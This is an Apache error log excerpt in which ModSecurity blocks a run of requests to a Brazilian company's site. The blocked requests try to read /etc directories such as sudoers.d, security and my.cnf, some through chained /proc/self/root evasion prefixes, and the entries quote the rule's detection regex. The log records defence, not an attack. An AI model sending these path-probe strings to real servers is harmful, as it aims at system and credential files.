[Wed Mar 18 04:13:09.860859 2026] [:error] [pid 15826:tid 140411607643904] [client 216.73.216.191:60936] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQheoXxyEfFpUF8f8vvwAAAVA"]
[Wed Mar 18 04:13:10.053789 2026] [:error] [pid 15051:tid 140411725141760] [client 216.73.216.191:60946] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQhimAPhZkrhU8w4kwMwAAAII"]
[Wed Mar 18 04:13:10.171889 2026] [:error] [pid 17653:tid 140411725141760] [client 216.73.216.191:60960] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQhsdf6f5d65gmYZSTPQAAAsI"]
[Wed Mar 18 04:13:10.209653 2026] [:error] [pid 11816:tid 140411565680384] [client 216.73.216.191:60966] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQhuw_le52K8_3pV2iJAAAAhU"]
[Wed Mar 18 04:13:10.331049 2026] [:error] [pid 29882:tid 140411666392832] [client 216.73.216.191:60978] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQhkzinOy1jxa1j4fU9AAAAQk"]
[Wed Mar 18 04:13:11.052003 2026] [:error] [pid 17887:tid 140411590858496] [client 216.73.216.191:32770] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQhwkwaGbbGflqUZDU-gAAANI"]
[Wed Mar 18 04:13:11.248860 2026] [:error] [pid 31803:tid 140411632822016] [client 216.73.216.191:32778] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQh-yqAr6etmhZHNp7UgAAAE0"]
[Wed Mar 18 04:13:11.440310 2026] [:error] [pid 17653:tid 140411658000128] [client 216.73.216.191:32786] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQh8df6f5d65gmYZSTQAAAAso"]
[Wed Mar 18 04:13:11.556736 2026] [:error] [pid 17653:tid 140411708356352] [client 216.73.216.191:32794] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQh8df6f5d65gmYZSTQQAAAsQ"]
[Wed Mar 18 04:13:12.080743 2026] [:error] [pid 17653:tid 140411540502272] [client 216.73.216.191:32830] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQiMdf6f5d65gmYZSTQwAAAtg"]
[Wed Mar 18 04:13:13.749835 2026] [:error] [pid 29882:tid 140411725141760] [client 216.73.216.191:32850] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQiEzinOy1jxa1j4fU9gAAAQI"]
[Wed Mar 18 04:13:13.751473 2026] [:error] [pid 17653:tid 140411607643904] [client 216.73.216.191:32844] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQiMdf6f5d65gmYZSTRQAAAtA"]
[Wed Mar 18 04:13:13.756293 2026] [:error] [pid 17653:tid 140411624429312] [client 216.73.216.191:32852] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQiMdf6f5d65gmYZSTRwAAAs4"]
[Wed Mar 18 04:13:17.368299 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:54006] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQjfu8EFLIOrSqIpvIwQAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:13:31.227122 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:39882] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQm-yqAr6etmhZHNp7bgAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:13:41.001123 2026] [:error] [pid 15826:tid 140411548894976] [client 216.73.216.191:33758] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQpOoXxyEfFpUF8f8vygAAAVc"]
[Wed Mar 18 04:14:00.188949 2026] [:error] [pid 17887:tid 140411641214720] [client 216.73.216.191:34280] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQuAkwaGbbGflqUZDVGAAAAMw"]
[Wed Mar 18 04:14:00.800601 2026] [:error] [pid 17887:tid 140411691570944] [client 216.73.216.191:34322] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQuAkwaGbbGflqUZDVGwAAAMY"]
[Wed Mar 18 04:14:03.630400 2026] [:error] [pid 29882:tid 140411725141760] [client 216.73.216.191:34470] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQu0zinOy1jxa1j4fVEQAAAQI"]
[Wed Mar 18 04:14:03.927181 2026] [:error] [pid 19507:tid 140411632822016] [client 216.73.216.191:34492] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQu9Y0UrI5A3LftIxVaAAAAY0"]
[Wed Mar 18 04:14:05.055875 2026] [:error] [pid 26799:tid 140411565680384] [client 216.73.216.191:34566] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQvda6ubjKNq_cu4ZY7AAAA1U"]
[Wed Mar 18 04:14:28.769404 2026] [:error] [pid 15826:tid 140411666392832] [client 216.73.216.191:35200] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQ1OoXxyEfFpUF8f8v2wAAAUk"]
[Wed Mar 18 04:14:49.572057 2026] [:error] [pid 29882:tid 140411565680384] [client 216.73.216.191:36238] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQ6UzinOy1jxa1j4fVLgAAARU"]
[Wed Mar 18 04:14:52.461943 2026] [:error] [pid 11816:tid 140411666392832] [client 216.73.216.191:36428] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQ7Ow_le52K8_3pV2igwAAAgk"]
[Wed Mar 18 04:14:59.007360 2026] [:error] [pid 19507:tid 140411649607424] [client 216.73.216.191:10715] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQ89Y0UrI5A3LftIxVogAAAYs"]
[Wed Mar 18 04:15:08.980217 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:34968] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpQ_Na6ubjKNq_cu4ZZOQAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:15:54.272145 2026] [mime_magic:error] [pid 26799:tid 140411557287680] (70014)End of file found: [client 74.7.241.31:55360] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/usr/lib/systemd/user
[Wed Mar 18 04:16:09.915164 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:41102] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpROQkwaGbbGflqUZDVdQAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:16:14.631596 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.241.31:52078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpRPtY0UrI5A3LftIxV1gAAAYg"], referer: 